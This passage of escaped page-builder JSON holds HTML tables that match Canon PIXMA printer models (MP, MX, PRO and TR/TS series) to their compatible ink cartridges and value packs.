width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S 